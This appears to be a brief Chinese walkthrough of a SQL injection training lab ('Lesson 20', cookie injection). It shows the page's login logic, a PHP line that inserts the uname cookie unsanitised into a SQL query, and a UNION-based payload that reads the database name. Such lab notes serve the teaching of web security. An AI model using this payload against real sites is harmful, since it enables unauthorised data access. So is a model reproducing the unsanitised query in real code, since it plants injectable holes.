Lesson - 20
POST - Cookie Injection - Uagent field - error based
该网页大概框架如下:
if(!isset($_COOKIE['uname']))
{
//声明实现过滤函数check_input
function check_input($value)
{
......
}
//对username,password进行验证登陆
//如果username,password匹配,setcookie
//重新载入当前页面
}
else
{
if(!isset($_POST['submit']))
{
//输出各种信息。
}
else
{
//删除cookie,重新载入当前界面
}
}
以username:admin , password:admin登陆:
通过查看php源码,发现cookie可以注入:
$cookee = $_COOKIE['uname'];
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
更改cookie,使uname = ' union select 1 , 2 , database()#
同理可以得到其他信息,进一步注入。